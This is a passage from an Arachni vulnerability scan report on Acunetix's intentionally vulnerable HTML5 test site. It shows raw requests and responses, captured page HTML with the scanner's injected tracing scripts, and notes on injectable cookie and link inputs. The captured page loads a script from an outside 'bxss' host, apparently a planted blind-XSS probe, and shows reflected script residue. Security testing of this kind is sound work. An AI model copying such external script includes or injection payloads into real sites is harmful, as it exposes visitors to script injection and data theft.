name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. 
</p> <p class="navbar-text pull-right"> Welcome <b></script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div 
class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== 
--> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script 
type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe, as a series of events, the steps required to restore the page to the state it had when the scanner processed it. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options |
|---|---|---|---|---|
| 0 | 9.163898 | load | page | |
| 1 | 3.86217 | request | http://testhtml5.vulnweb.com/ | |
| 2 | 3.554117 | request | http://testhtml5.vulnweb.com/static/app/services/itemsService.js | |
| 3 | 0.30496 | request | http://testhtml5.vulnweb.com/ajax/popular?offset=0 | |
| 4 | 0.812222 | request | http://testhtml5.vulnweb.com/static/app/partials/itemsList.html | |
| 5 | 0.570796 | request | http://testhtml5.vulnweb.com/static/scr/default.png | |
| 6 | 0.800369 | click | `<a href="#/archive" data-arachni-id="916551842">` | |
| 7 | 0.355032 | request | http://testhtml5.vulnweb.com/static/app/partials/archive.html | |
| 8 | 0.250829 | request | http://testhtml5.vulnweb.com/ajax/archive | |
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.4
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,*
Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="55824100"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* 
This is the original HTTP response body.
Generates a simple list of safe/unsafe URLs.
Analyzes the scan results and logs issues which persist across different pages.
This is usually a sign of a lack of a central/single point of input sanitization, a bad coding practice.
cookie input username using GET at the following pages:
link input id using GET at the following pages: